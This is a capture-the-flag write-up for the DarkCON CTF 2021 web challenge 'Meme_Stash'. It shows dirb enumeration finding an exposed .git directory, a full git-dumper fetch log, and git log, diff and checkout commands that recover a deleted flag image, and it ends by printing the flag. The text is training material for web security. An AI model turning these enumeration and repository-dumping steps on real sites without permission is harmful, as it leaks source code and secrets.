# DarkCON CTF 2021 – Meme_Stash
* **Category:** web
* **Points:** ?
## Challenge
> White Wolf cloned this website for some memes while browsing some memes he
> stumbled upon the flag but now he is not able to find it can you help him
>
> Note: This chall does not require any brute forcing
>
> http://meme-stash.darkarmy.xyz/
## Solution
A basic enumeration will reveal the presence of a Git repository.
```
root@m3ss4p0:~# dirb http://meme-stash.darkarmy.xyz/
/usr/share/dirb/wordlists/common.txt -z 200
http://meme-stash.darkarmy.xyz/.git/HEAD
```
So you can use [git-dumper](https://github.com/arthaud/git-dumper) to dump all
the repository.
```
root@m3ss4p0:~/Tools/git-dumper# ./git-dumper.py http://meme-
stash.darkarmy.xyz/.git/ ../../meme-stash
[-] Testing http://meme-stash.darkarmy.xyz/.git/HEAD [200]
[-] Testing http://meme-stash.darkarmy.xyz/.git/ [403]
[-] Fetching common files
[-] Fetching http://meme-stash.darkarmy.xyz/.git/description [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/commit-msg.sample [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.gitignore [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/post-receive.sample
[404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/pre-applypatch.sample
[200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/COMMIT_EDITMSG [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/applypatch-msg.sample
[200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/post-commit.sample
[404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/post-update.sample
[200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/pre-commit.sample [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/pre-push.sample [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/index [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/prepare-commit-
msg.sample [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/update.sample [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/hooks/pre-receive.sample
[200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/info/exclude [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/objects/info/packs [404]
[-] Finding refs/
[-] Fetching http://meme-stash.darkarmy.xyz/.git/config [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/logs/refs/remotes/origin/HEAD
[200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/FETCH_HEAD [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/HEAD [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/logs/HEAD [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/ORIG_HEAD [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/info/refs [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/logs/refs/stash [404]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/logs/refs/remotes/origin/master [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/logs/refs/heads/master [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/packed-refs [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/refs/heads/master [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/refs/remotes/origin/HEAD
[200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/refs/heads/main [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/refs/remotes/origin/master
[404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/refs/stash [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/refs/remotes/origin/main
[404]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/refs/wip/index/refs/heads/master [404]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/logs/refs/heads/main [200]
[-] Fetching http://meme-stash.darkarmy.xyz/.git/logs/refs/remotes/origin/main
[404]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/8f/e8fb21b73bceac61db2bcc7b72d31a9b564e6d
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/00/00000000000000000000000000000000000000
[404]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/2c/dfab38e64a1a97e02d6bbe3801ca51d508aed2
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/74/7f8b0e2915bb6185848e2a27b6cb2e37be6d83
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/99/504cd1398a7f7ec3a5baaaa05e297c61c2189d
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/83/7cdbe893ac96998e2c5f523b906c519ec5005a
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/33/4ed6aeb833d46f81e5882b4c6f6712e9b071b9
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/2a/e8ba9e461f9c44f86fb9bdbfae9a2f82a1a032
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/5a/7136b7eb012e790511efa69e39326e4c569e22
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/74/3414208ede0f80fd5fd821e0756916378c8aba
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/3d/cdc9d93ab5b05228c3e4950d57a1c24751eb01
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/91/010559a7387a3b24d157a0e32acbd60339db00
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/14/6831302c94e3dfed16c9a90baed8770a82b544
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/a1/8518b0133ce59be487bd61a675a2130238ac98
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/dc/5774b462a1b9706538026cea32d72498ea8797
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/15/f0c294c29663d22ed07841bd0f863c79daf5a0
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/43/0b29a5542aaa222aff94b3c19bc80961aff64b
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/59/d72179a0ca8cc03132d6ce30c8ca4bc9ad3a34
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/e1/287a203c205104af6474d8ba188366653b772c
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/51/f6f6560cf4edd5f6f8b59c141c3dbce916a20b
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/d6/c0c5a409c9ec655a8dde53f1d998f723a90fcb
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/ee/bd2bb56a17352de1e6cc9b3aee66fe8a2cdb5e
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/2e/fb9de5b8bae537662db67ae959c828c95496b4
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/a0/ecc15b44e86be4472eec30a2947f568f00f5b0
[200]
[-] Fetching http://meme-
stash.darkarmy.xyz/.git/objects/ba/a389503d746fe8977f7f888ba72f280891e6bd
[200]
[-] Running git checkout .
```
With `git log` you can discover a commit (i.e.
`747f8b0e2915bb6185848e2a27b6cb2e37be6d83`) with a suspect message (i.e.
`oops`).
```
root@m3ss4p0:~/Tools/git-dumper# cd ../../meme-stash/meme-stash
root@m3ss4p0:~/meme-stash/meme_stash# git log
commit 747f8b0e2915bb6185848e2a27b6cb2e37be6d83 (HEAD -> main, origin/main,
origin/HEAD)
Author: karma9874 <[email protected]>
Date: Wed Feb 3 16:45:49 2021 +0530
oops
commit 146831302c94e3dfed16c9a90baed8770a82b544
Author: karma9874 <[email protected]>
Date: Wed Feb 3 16:44:57 2021 +0530
added some memes xD
commit e1287a203c205104af6474d8ba188366653b772c
Author: karma9874 <[email protected]>
Date: Wed Feb 3 16:44:10 2021 +0530
added js and css
commit eebd2bb56a17352de1e6cc9b3aee66fe8a2cdb5e
Author: karma9874 <[email protected]>
Date: Wed Feb 3 16:42:22 2021 +0530
added html file
```
Probably the flag was present before that commit and has been removed. For
this reason you can compare commits.
```
root@m3ss4p0:~/meme-stash/meme_stash# git diff
747f8b0e2915bb6185848e2a27b6cb2e37be6d83
146831302c94e3dfed16c9a90baed8770a82b544
diff --git a/index.html b/index.html
index 9101055..d6c0c5a 100644
\--- a/index.html
+++ b/index.html
@@ -46,6 +46,10 @@
\+
\+ 
\+
+
__
@@ -54,7 +58,7 @@
\-
\+
diff --git a/meme_stash/flag.jpg b/meme_stash/flag.jpg
new file mode 100644
index 0000000..a0ecc15
Binary files /dev/null and b/meme_stash/flag.jpg differ
```
The previous commit (i.e. `146831302c94e3dfed16c9a90baed8770a82b544`)
contained the flag. You can restore that file checking out the commit.
```
root@m3ss4p0:~/meme-stash/meme_stash# git checkout
146831302c94e3dfed16c9a90baed8770a82b544
root@m3ss4p0:~/meme-stash/meme_stash# ls
1.jpg 2.jpg 3.jpg 4.jpg 5.jpg 6.jpg 7.jpeg 8.jpeg 9.jpg flag.jpg
```
The flag is the following.
```
darkCON{g1t_d4_fl4g}
```
Original writeup (https://github.com/m3ssap0/CTF-
Writeups/blob/master/DarkCON%20CTF%202021/Meme_Stash/README.md).